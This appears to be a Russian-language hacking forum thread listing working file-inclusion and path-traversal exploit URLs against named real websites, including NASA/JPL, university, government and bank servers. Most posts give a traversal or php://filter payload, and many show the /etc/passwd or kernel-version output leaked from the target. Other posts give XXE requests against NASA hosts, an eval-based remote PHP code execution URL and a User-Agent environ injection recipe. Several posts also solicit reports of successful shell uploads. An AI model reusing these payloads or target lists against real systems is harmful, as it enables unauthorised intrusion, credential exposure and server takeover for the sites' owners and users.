http://sartraccc.ru/i.php?oper=read_file&filename=/etc/passwd

http://caring.jafnretti.is/forum/users/shell666.php?cmd=phpinfo();

pr4

http://flight228.net/blog/index.php?post=../config.php%00

http://www.hiltl.ch/restaurant.php?id=../../../../../../../../../etc/passwd%00

RFI, правда права read-only

http://www.geishaclub.ru/massag.php?text=RFI

НЕЛЬЗЯ ПОСТИТЬ ШЕЛЛЫ, ПАРОЛИ К АДМИНКАМ/ФТП И ПРОЧЕЕ

http://clubesa.info/print5.php?page=../../../../../../../../../../etc/passwd

http://portix.info/print.php?page=../../../../../../../../../../etc/passwd


ребята вот нашол такой инклуд http://old.xalqbank.az/main.php?lg=dsdsds . но ни как не получается его эксплуатировать то фильтр режет то вообще не работает не подскажите как можно эксплуатировать его?


Читалка файлов с расширением .php (Ищи что нибудь типа config.php)

http://old.xalqbank.az/main.php?lg=/../../index

deleted

http://www.jlc-software.com/index.php?page=index.php

http://hamantfoundation.org/centromedico/index.php?page=/home/dhamant/hamantfoundation.org/centromedico/index.php

http://www.nfm.co.za/index.php?page=../../../../../../../../../proc/self/fd/6

http://www.renoldiimmobiliare.it/index.php?page=../../../../../../../../proc/self/fd/8

Возможно исполнение произвольного PHP кода, размещенного в любом файле (картинка/текстовый документ и пр.) на сервере.


http://thepiratebay.org/robots.txt/.php
Описание уязвимости: http://habrahabr.ru/blogs/sysadm/100961/

http://motor.power-man.ru/article.php?value=/etc/passwd

Парламент Уганды.


http://www.parliament.go.ug/mpdata/members.hei?$debug=pp&$file=/srv/www/htdocs/configuration.php


хоть и не php-inj

http://www.cfi.co.ug/index.php?p=../index

http://izhpost.ru/index.php?PAGE=../../../etc/passwd

http://jrudevels.org/index.php?pg=../../../etc/passwd

удаленное выполнение php кода


http://www.rekom.kursk.ru/forum/register.php
username: phpinfo.php
password: random
mail:
http://www.rekom.kursk.ru/forum/users/phpinfo.php


на сервачке есть сайт с тИц 275, но доступ к нему - только чтение. также там хостился сайт fms.kursk.ru, сейчас переехал.

php-injection (.mil)

.mil


http://sungrazer.nrl.navy.mil/index.php?p=index.php

http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../etc/hosts

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://www.royalcliff.com/m/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00

http://supernova.kiev.ua/index.php?page=../../../../etc/passwd

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

http://sergei-bronza.ru/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00

http://www.amarc.org/index.php?p=../../../../../etc/passwd

ПР 7, ТИЦ 20

http://www.haefele-mietpark.de/?MAINPAGE=../../../../../etc/passwd

http://www.olarkin.com/main/information/index.php?page=/../../../../../../../../etc/passwd

PHP инъекция на сайте NASA


http://ceres.larc.nasa.gov/ceres_stm.php?date=../../../../../../../../../../etc/passwd%00

Ответ:


at:x:25:25:Batch jobs
daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP
account:/srv/ftp:/bin/bash games:x:12:100:Games
account:/var/games:/bin/bash gdm:x:50:104:Gnome
Display Manager daemon:/var/lib/gdm:/bin/false
hacluster:x:90:90:heartbeat
processes:/var/lib/heartbeat/cores/hacluster:/bin/false
haldaemon:x:101:102:User for
haldaemon:/var/run/hal:/bin/false lp:x:4:7:Printing
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer
daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages
viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false news:x:9:13:News
system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
postfix:x:51:51:Postfix
Daemon:/var/spool/postfix:/bin/false
root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH
daemon:/var/lib/sshd:/bin/false suse-ncc:x:102:105:Novell
Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy
system:/etc/uucp:/bin/bash
www:x:80:3073::/var/lib/wwwrun:/bin/false
wwwrun:x:30:8:WWW daemon
apache:/var/lib/wwwrun:/bin/false
cmgather:x:55881:55881:CMGather:/etc/cm_info/data:/bin/sh
splunk:x:65535:65535:Splunk
Server:/opt/splunkforwarder:/bin/bash +::::::

http://www.continuum2.com/index.php?file=%2Fetc%2Fpasswd

GameCaptain.de


http://pc.gamecaptain.de/index.php?file=robots.txt&week=31



http://storyevertelling.com/index.php?file=robots.txt

http://www.stmarytx.edu/print.php?s=php://filter/convert.base64-encode/resource=/usr/local/apache2/htdocs/technology/help/

http://secchi.nrl.navy.mil/index.php?p=index.php

Если не сбоянил, то

http://www.hogwarts.ru/bestpupil.php?page=2&s=../../../../../../../../../../etc/passwd%00.png&uid=

Ps.Плачь, поттероман

http://mvdrk.karelia.ru/index.php?lawid=../index

наша служба и опасна и трудна...

http://www.autoriparatori.org/index.php?pag=/etc/passwd

http://www.funkuebung.com/index.php?page=/etc/passwd

http://www.vanmaele.com/index.php?page=/etc/passwd

http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00

http://www.smsclothing.com/content.php?id=../../../../../../../etc/passwd%00

http://gumerov.ru/index.php?pg=../../../../../etc/passwd%00

http://www2.mati.ru/english/index.php?path=../../../../../../etc/passwd%00

Оффициальный сайт губернатора штата Луазианы США

Inject


_ttp://www.gov.state.la.us/index.cfm?md=../../../../../../etc/passwd%00&tmp=detail&articleID=3122

Answear


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
etc....

Акция: internet without shit!!!

http://nottingham.ac.uk/common/files/download.php?path=/plzcnlab/oridb/cerevisiae/utilities/&file=ori_connect.php

Тиц 275,


_http://tomall.ru/paper.php?cod=-3'+union+select+1,2,3,4,5,6,7,8,'../../../../../../../../../../../etc/passwd',0,11,12,13,14,15,16,17,1818+--+

_http://to-maxima.com/index.php?page=../../../../../../../etc/passwd

http://tubeofhell.com:80/index.php?p=../../../../../../../../your_patch_%00

http://kosmetika.potrebitel.ru/printer.php?../../../../../etc/passwd

http://www.prp-energo.ru/download/load.phtml?file=index.php

http://www.deffki.su/?go=../../../../../123.txt


Добавляется расширение /php/, нулл байт не катит, зато катит слэшевая альтернатива =)

http://crimas.ru/5_izdani/books/2004_isbn_6/index.php?file=php://filter/convert.base64-encode/resource=index

http://www.photo1000.ru/index.php?node=../../../../../../../../../../../etc/passwd%00

http://www.bid-qualitysummit.com/ru/page.php?d=php://filter/convert.base64-encode/resource=page

http://hea-www.harvard.edu/XJET/img-data.cgi?../../../../../../../../../../etc/passwd
http://www2.selu.edu/Administration/Inst-Research/FacStaff/data.cgi?../../../../../../../../../../etc/hosts
http://www.cs.uofs.edu/~pjs2f/index.cgi?incl=../../../../../../../../../etc/passwd
http://www.cs.scranton.edu/~cmps/template.php?body=../../../../../../../../etc/passwd
https://secweb.cs.odu.edu/~zeil/submit/websubmit.cgi?asstinfo=../../../../../../etc/passwd

ps пишите если получится ливануть

http://anavalerobetran.com/?page=php://filter/convert.base64-encode/resource=index.php

Если кто-нибудь куда-нибудь зальет шелл, будьте добры, напишите мне как вы это сделали.

http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00

http://razvlekaykaa.ru/index.php?option=com_bca-rss-syndicator&feed_id=1&controller=../../../../../../../../proc/self/environ%00

http://psiyoga.ru/index.php?option=com_gcalendar&view=google&Itemid=71&controller=../../../../../../../etc/passwd%00

http://www.old.skippers.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=40&gcalendarview=day&lang=ru&day=&controller=../../../../../../../proc/self/environ%000

http://ms.cmc.msu.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=4&gcalendarview=week&year=2012&month=3&day=14&controller=../../../../../../etc/passwd%000

http://keyave.ru/index.php?option=com_gcalendar&view=google&Itemid=55&controller=../../../../../../etc/passwd%00

http://www.pentictonherald.ca/stories_business.php?id=../../../index

http://www.kyrgyz.ru/dict/dict.php?l=../../../../../../../../../../../etc/passwd%00

http://www.advance-guard.net/index.php?id=index

Тиц 90,PR 4
http://gati-online.ru/index.php?option=com_ckforms&controller=../../../../../../../../etc/passwd%00


Возьмут в роа

Сорь за оффтоп

http://skyvaledoaco.com.br/index.php?page=php://filter/convert.base64-encode/resource=index

http://www.evisun.ru/index.php?option=com_ckforms&controller=../../../../../../../../etc/passwd%000

http://rkkocenka.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000

http://www.school-potencial.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%00

http://ledaro.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000

http://temchik.ru/index.php?page=/etc/passwd%00

XML-Inject на NASA.GOV

Отправляем специально сконфигурированный пакет:


Content-Type = 'application/x-amf';

Host = 'informal.jpl.nasa.gov';

Content-Length = '904'; //тут длина вашего запроса.� �Величина варьируется

Request.Data = '

]>







bodyclientIdcorrelationId

destinationheadersmessageId

operationtimestamptimeToLive











DSIdDSMessagingVersion



nil1



&x3;

500







На что видим ответ


Response.Data=

root:x:0:0:Super-User:/:/sbin/sh

daemon:x:1:1::/:bin:x:2:2::/usr/bin:/bin/false

sys:x:3:3::/:adm:x:4:4:Admin:/var/adm:/bin/false

lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false

uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false nuucp:x:9:9:uucp

Admin:/var/spool/uucppublic:/bin/false smmsp:x:25:25:SendMail

Message Submission Program:/:/bin/false listen:x:37:4:Network

Admin:/usr/net/nls:/bin/false gdm:x:50:50:GDM

Reserved UID:/:/bin/false webservd:x:80:80:WebServer

Reserved UID:/opt/home/webservd:/bin/pfsh

postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh

svctag:x:95:12:Service Tag UID:/:nobody:x:60001:60001:NFS

Anonymous Access User:/:/bin/false noaccess:x:60002:60002:No

Access User:/:/bin/false nobody4:x:65534:65534:SunOS 4.x NFS

Anonymous Access User:/:/bin/false metrics:x:150:10:System

Metrics Account:/opt/metrics:/bin/sh pdiag:x:153:10:Patchdiag

Account:/opt/pdiag:/bin/sh sysaudit:x:152:10:System Audit

Account:/opt/sysaudit:/bin/sh+@jplit-sa:x:::::: +@web:x::::::

Вариация первого запроса:


Content-Type = 'application/x-amf';

Host = 'informal.jpl.nasa.gov';

Content-Length = '904'; //тут длина вашего запроса.� �Величина варьируется

Request.Data = '

]>







bodyclientIdcorrelationId

destinationheadersmessageId

operationtimestamptimeToLive











DSIdDSMessagingVersion



nil1



&x3;

500







На что видим ответ


Response.Data=

#ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ #

# Copyright (c) 1991-1998 by Sun Microsystems, Inc.

# All rights reserved. #

# syslog configuration file. #

# This file is processed by m4 so be care ful to quote (`') names

# that match m4 reserved words. Also, withi n ifdef's, arguments

# containing commas must be quoted. #

# JPLIT syslog.conf # last updated 2008-06-24

# *.err;kern.notice;auth.notice /dev/sysmsg *.info;kern.debug;auth.err;mail.crit;local 0.crit

/var/adm/messages

*.alert;kern.err;daemon.err operator

*.alert root*.emerg

*auth.notice/var/log/authlog mail.info/var/log/syslog

# Log ipfilter info separately: local0.info /var/log/ipflog

# if a non-loghost machine chooses to have authenticatio n messages

# sent to the loghost machine, un-comment out the following line:

#auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) #mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) #

# non-loghost machines will use the following line s to cause "user"

# log messages to be logged locally. # ifd ef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emer g * ) # #

# Uncomment this line to send syslog data to JPL Security:

# *.err;daemon.notice;auth.info @jplnsm.jpl.nasa .gov

# 3DB8AF0E-381B-5C34-E477-F5E594ECC3360.03DB8AF0E-380E-7324-6A71-ABBB0CDA7BAF

Скоро выложу самописную утилитку для прогулки по директориям =)

У меня не НАСА, конечно, но очень забавляющий меня эффект от инклуда index'а.

http://test.tools.by/?q=stores&page=index

http://www.vigvam.pl/index.php?option=com_jesubmit&view=../../../../../etc/passwd%00

http://www.itisvinci.com/index.php?file=index.php

http://www.scholasticorum.mish.uw.edu.pl/index.php?file=php://filter/convert.base64-encode/resource=index.php

http://aa-fenix.kiev.ua/pages.php?pag=../index

http://www.ossbenchmarks.com/viewsource.php?file=../../../proc/self/fd/2

http://gugenplan.spb.ru/cms/statistics.php?action=countries&l=../../../../../../../../../../etc/passwd%00&name=phpcounter&page=0​

отключаем редирект

/usr/home/kga/gugenplan/www/cms/phpcounter/defs.php


@include("langs/en.php");

@include("langs/$lang.php");

@include("langs/$_GET[l].php");

?>

http://www.qcivalves.com/index.php?page=/proc/self/environ

Тема стара но имеет место быть...


http://www.
torrentreactor.net
/browse.php?id=../../../../../../../../../../../../etc/passwd
%00


Перепробовал уеву тучу путей, кроме этого файла ничего не смог прочитать.

У кого есть мысли?

http://www.colibri.ge/display/index.php?z=end&company=hotels/vere/index.php?cat=/proc/self/environ

На темной фоне нажать Ctrl+A.

VY_CMa


www.torrentreactor.net/browse.php?id=../../../../../../../../../../../../opt/inweb/sites/torrentreactor/www.torrentreactor.net/avatars/1/4/1/7/1417549.jpg%00

VY_CMa,

http://video.antichat.ru/video/16/

http://itakers.com/index.php?file=../../../proc/self/environ

PR=2


http://www.creacion.ch/index.php?option=com_ckforms&view=ckforms&id=1&Itemid=10&controller=../../../robots.txt%00

http://irh.wisc.edu/fellowships.php?menu=../../../etc/passwd

http://www.coregamers.us/index.php?id=../../../proc/self/environ%00

Чистая реализация инжекта похапе-кода в хранилище переменных окружения.

1. Гуглим функции сURL'a.

2. Пять минут пишем на коленке кулхацкерский скрипт GET-запроса c подменой Юзер-Агента и возвратом ответа.


');

curl_setopt($get,CURLOPT_RETURNTRANSFER,1);

$result=curl_exec($get);

curl_close($get);

echo($result);

?>

3. Запускаем

4. ???

5. PROFIT!!!

http://rghost.ru/38644108/image.png

Ну, или подменяем Юзер-Агент "на лету", например Tamper Data'ой.

http://member.realsexdates.com/clsJSPHP.php?cbr=0&phpinc=../../../../../../etc/passwd

http://www.horizont.by/index.php?page=../../../../proc/self/cmdline%00

НЭИС-Телеком Сибирь - Спутниковое телевидение Триколор (надоела их реклама) тИЦ: 80 / PR: 2


http://www.satnsk.ru/index.php?view=/etc/passwd

Эти ребята ничему не учатся =/

Ещё 1 XML-Inject на NASA.GOV

Host = solidearth.jpl.nasa.gov

Query



]>




bodyclientIdcorrelationId
destinationheadersmessageId
operationtimestamptimeToLive





DSIdDSMessagingVersion

nil1

&x3;
500




Answear:


root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:/bin/false
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm:/bin/false
lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false
uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/bin/false
smmsp:x:25:25:SendMail Message Submission Program:/:/bin/false
isten:x:37:4:Network Admin:/usr/net/nls:/bin/false
gdm:x:50:50:GDM Reserved UID:/:/bin/false
webservd:x:80:80:WebServer Reserved UID:/opt/home/webservd:/bin/pfsh
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:/bin/false
noaccess:x:60002:60002:No Access User:/:/bin/false
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous
Access User:/:/bin/false metrics:x:150:10:System Metrics Account:/opt/metrics:/bin/sh
pdiag:x:153:10:Patchdiag Account:/opt/pdiag:/bin/sh
sysaudit:x:152:10:System Audit Account:/opt/sysaudit:/bin/sh
netiqamc:x:65535:65535::/opt/netiqamc:/bin/sh +@jplit-sa:x:::::: +@web:x:::::: +@ops-level2:x::::::

Ну и вот ещё


_ttp://solidearth.jpl.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/upload/test.html

...если вы понимаете о чём я... =)

Читалка

/var/www/web4/html/en-relaunch-2008/download.php






данные для подключения к бд

http://relaunch.falken-europe.com/download.php?imgName=../../../includes/php/ProjectSettingsInc.php

http://relaunch.falken-europe.com/download.php?imgName=../../../index.php

скуля


getAdminTemplateContent("","aModulEdit.htt");

include"admin_usr_includes/a".$_GET['adminusrincludes'] ."Inc.php";

}

elseif($_GET['adminusrincludes'] ==""&&$_GET['adminsysincludes'] !="")

{

$pageOutput=$abAP->getAdminTemplateContent("","aModulEdit.htt");

include"admin_sys_includes/a".$_GET['adminsysincludes'] ."Inc.php";

}

/* END Global PHP Modul/usr_include editor */

Немного рекурсии.

http://www.sghp.ru/index.php?page=index.php

http://www.vip-conferance.ru/foto.php?id=index

Ростелеком

http://stcm.ru/download.php?f=download.php

inthebreeze


http://www.inthebreeze.com/index.php?action=../../../../etc/passwd%00

http://www.cazino-monteoru.ro/index.php?pg=/home/config/passwd-proftpd.conf

polaris-inc

http://www.polaris-inc.com/index.php?action=../../../../etc/passwd%00

Портал CS:S


http://www.nextwin.ru/forum/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=./../../index.php

daily5remodel.com


http://www.daily5remodel.com/index.php?action=../../../../etc/passwd%00

http://scrollnews.ru/index.php?content=../index.php

http://www.kymite.ru/history.php?id=../../../../../../etc/passwd%00

http://www.tmship.ru/modules.php?mod=../../../../../etc/passwd%00

http://macrohosting.ru/?../../../../proc/version

tenerifepearl.com


http://www.tenerifepearl.com/modules.php?mod=../../../../../etc/passwd%00

http://www.alta-tour.net/priem_spb.php?id=../../index.php%00

Кто зальется отпишите в пм.

Эти товарищи занимаются информационной безопасностью

http://makescreen.ru/i/342.jpg


http://conf-opt.ifmo.ru/index.php?page=/etc/passwd

...


http://4vranchdouthitherefords.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

...

PR=2


http://hamantfoundation.org/centromedico/index.php?page=/etc/passwd

...

PR=1


http://www.epk.or.kz/index.php?page=php://filter/convert.base64-encode/resource=config.php

Свежие поступления

PR=5


http://www.ial7.ru.ac.th/index.php?page=php://filter/convert.base64-encode/resource=index.php

PR=4


http://www.musicenterprise.org/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

PR=3, DMOZ=true


http://www.otcdoors.com/index.php?lang=en&page=php://filter/convert.base64-encode/resource=filemanager/index.php

http://ozrics.dyndns.info/modules/page.php?id=../../../proc/version

Linux version 2.6.12.6-arm1 (root@NasARM4) (gcc version 3.4.4 (release) (CodeSourcery ARM 2005q3-2)) #2 Fri Sep 24 02:08:55 CST 2010

Inject

_ttp://carte.notrefutur.org/page.php?p=../../../../etc/passwd

Response


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

etc

_ttp://www.univie.ac.at/ptox/page.php?p=../../../../proc/version%00 (+environ%00)


Linux version 2.6.32-220.7.1.el6.x86_64(mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.4.6 2 0110731(Red Hat 4.4.6-3) (GCC) )#1 SMP Fri Feb 10 15:22:22 EST 2012

_ttp://europatweets.eu/page.php?p=../../../../../../../etc/passwd%00


Linux version 2.6.34.6-xxxx-std-ipv6-64(root@kernel-64.ovh.net) (gcc version 4.3.2(Debian 4.3.2-1.1) )#3 SMP Fri Sep 17 16:19:12 UTC 2010


зы. кто зальётся, отпишите в ПМ

_ttp://2010.sibico.com/index.php?content=../../../../../../etc/passwd%00

_ttp://www.kruger.ch/index.php?content=../etc/passwd%00

_ttp://www.software4schools.com/index.php?do=../../../etc/passwd%00


Linux version 2.6.18-028stab091.2(root@rhel5-build-x64) (gcc version 4.1.2 20080704(Red Hat 4.1 .2-46))#1 SMP Fri Jun 3 00:02:40 MSD 2011

_ttp://www.theworkingworld.org/index.php?action=../../../etc/passwd%00


Linux version 2.6.9-89.0.9.ELsmp(mockbuild@x86-007.build.bos.redhat.com) (gcc version 3.4.6 2 0060404(Red Hat 3.4.6-11))#1 SMP Wed Aug 19 08:07:15 EDT 2009

_ttp://www.cloud9cycles.com/index.php?content=../../../../../../etc/passwd%00


Linux version 2.6.18-274.12.1.el5(mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704(Red Hat 4.1.2-51))#1 SMP Tue Nov 29 13:37:46 EST 2011

_ttp://www.sasic.com/html/index.php?content=../../../../../proc/version%00


Linux version 2.6.9-5.ELsmp(bhcompile@decompose.build.redhat.com) (gc c version 3.4.3 20041212(Red Hat 3.4.3-9.EL4))#1 SMP Wed Jan 5 19:30:39 EST 2005

_ttp://www.okfarmbureau.org/index.php?action=../etc/passwd%00

_ttp://terror.fi/ybu/index.php?content=../../../../../etc/passwd%00


Linux version 2.6.32-379.5.1.lve1.1.9.6.1.el6.x86_64(mockbuild@koji.clo udlinux.com) (gcc version 4.4.6 20120305(Red Hat 4.4.6-4) (GCC) )#1 SMP Wed Sep 12 05:36:10 EDT 2012

_ttp://www.arcmusic.co.uk/index.php?page=../../../../../../etc/passwd%00


Linux version 2.6.18-194.8.1.el5(mockbuild@builder17.centos.org) (gcc� �version 4.1.2 20080704(Red Hat 4.1.2-48))#1 SMP Thu Jul 1 19:07:06 EDT 2010

_ttp://franchiseinfo.buffalowildwings.com/www/index.php?page=../../../../etc/passwd%00


Linux version 2.6.18-194.17.1.el5(mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.1.2 2 0080704(Red Hat 4.1.2-48))#1 SMP Mon Sep 20 07:12:06 EDT 2010

http://www.site-2010.ru/search/?text={${eval($_REQUEST[a])}}&a=ob_clean();eval(stripslashes($_REQUEST[e]));exit;&e=[php_code]

ob_clean(); - очистка буфера вывода, зачем лишний трафик гонять)

exit; - та же причина.

e=[php_code]

н-нати

_ttp://www.minibikini.net.ua/index.php?page=../../../../../../etc/passwd%00

_ttp://netrenderer.com/?page=../../../../../etc/passwd%00


Linux version 2.6.34.10-0.6-default (geeko@buildhost) (gcc version 4.5.0 20100604[gcc-4_5-branch revision 160292] (SUSE Linux) )#1 SMP 2011-12-13 18:27:38 +0100

_ttp://www.aunmas.com/doc/show_doc.php?doc=../../../../../../../../etc/passwd%00


Linux version 2.6.32.48-grsec-dh(root@dl345) (gcc version 4.4.5(Debian 4.4.5-8) )#1 SMP Thu Nov 24 09:29:43 CET 2011

_ttp://pheugo.com/cameras/index.php?page=../../../../../../etc/passwd%00


Linux version 3.0.9-bl3-grsec(root@debian) (gcc version 4.4.5(Debian 4 .4.5-8) )#9 SMP Thu Feb 2 08:22:02 EST 2012

_ttp://www.thegreatlakesgroup.com/index.php?page=../../etc/passwd%00

_ttp://povstanets.kiev.ua/index.php?do=../../../../../../etc/passwd%00

ps. Жду залившихся в пм

_ttp://ptwc.weather.gov/text.php?id=../../../../../etc/passwd%00


Linux version 2.6.32-279.1.1.el6.x86_64(mockbuild@x86-003.build.bos.redhat.com) (gcc version 4.4.6 2 0120305(Red Hat 4.4.6-4) (GCC) )#1 SMP Wed Jun 20 11:41:22 EDT 2012

_ttp://medclinic.bli.uci.edu/doctors.php?doc=../../../../etc/passwd%00


Linux version 2.6.29.6-213.fc11.i686.PAE(mockbuild@x86-3.fedora.phx.redhat.com) (gcc version 4.4.0 20 090506(Red Hat 4.4.0-4) (GCC) )#1 SMP Tue Jul 7 20:59:29 EDT 2 009

_ttp://www.allangurganus.com/book.php?doc=../../../../../../etc/passwd%00


Linux version 3.0.9-bl3-grsec(root@debian) (gcc version 4.4.5(Debian 4 .4.5-8) )#9 SMP Thu Feb 2 08:22:02 EST 2012

_ttp://sindicat.info/veure.php?doc=../../../../../etc/passwd%00


Linux version 2.6.30-5.slh.1-sidux-amd64(Debian 2.6.30-20) (s.l-h@gmx.de) (gcc version 4.3.4(Debian 4.3.4-1) )#1 SMP PREEMPT Sun Aug 16 22:25:06 UTC 2009

_ttp://www.todayshospitalist.com/index.php?b=../../../../etc/passwd%00


Linux version 2.6.9-023stab046.2-enterprise(root@rhel4-32) (gcc version 3.4.5 20051201(Red Hat 3.4. 5-2))#1 SMP Mon Dec 10 15:22:33 MSK 2007

_ttp://www.catho.org/9.php?d=../../../../etc/passwd%00


Linux version 2.6.32-22-generic-pae(buildd@palmer) (gcc version 4.4.3(Ubuntu 4 .4.3-4ubuntu5) )#36-Ubuntu SMP Thu Jun 3 23:14:23 UTC 2010

_ttp://www.mspaintadventures.com/?s=../../../../etc/passwd%00

_ttp://www.atmos.albany.edu/index.php?d=../../../../../etc/passwd%00

_ttp://www.stadtgarten.de/?m=../../../../../etc/passwd%00


Linux version 2.6.26-2-amd64(Debian 2.6.26-29) (dannf@debian.org) (gcc version 4.1.3 200 80704(prerelease) (Debian 4.1.2-25))#1 SMP Sun Mar 4 21:48:06 UTC 2012

_ttp://www.nfps.no/index.php?doc=../../../../../../../../etc/passwd%00


Linux version 2.6.32-28-server(buildd@allspice) (gcc version 4.4.3(Ubun tu 4.4.3-4ubuntu5) )#55-Ubuntu SMP Mon Jan 10 23:57:16 UTC 2011

_ttp://www.montecarlonet.org/index.php?p=../../../../etc/passwd%00


Linux version 2.6.31.14-0.6-desktop(geeko@buildhost) (gcc version 4.4.1[gcc-4_4-branch revision 150839] (SUSE Linux) )#1 SMP PREEMPT 2010-12-10 11:18:32 +0100

_ttp://www.physicsmasterclasses.org/index.php?cat=../../../etc/passwd%00

_ttp://www.cjr.org/resources/?c=../../../../../etc/passwd%00


Linux version 2.6.32-43-server(buildd@allspice) (gcc version 4.4.3(Ubun tu 4.4.3-4ubuntu5.1) )#97-Ubuntu SMP Wed Sep 5 16:56:41 UTC 2012

_ttp://www.gardenwriters.org/gwa.php?p=../../../../etc/passwd%00


Linux version 2.6.18-274.7.1.el5PAE(mockbuild@builder10.centos.org) (g cc version 4.1.2 20080704(Red Hat 4.1.2-51))#1 SMP Thu Oct 20 17:03:59 EDT 2011

_ttp://www.rbg.org.uk/index.php?p=../../../../etc/passwd%00


Linux version 2.6.27.41-170.2.117.fc10.x86_64(mockbuild@x86-4.fedora.phx.redhat.com) (gcc version 4.3.2 20 081105(Red Hat 4.3.2-7) (GCC) )#1 SMP Thu Dec 10 10:36:29 EST 2009

_ttp://www.mss.cbi.uni-erlangen.de/index.php?p1=../../../../../../../../../etc/passwd%00

http://junona.org/modules.php?name=maps&type=../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.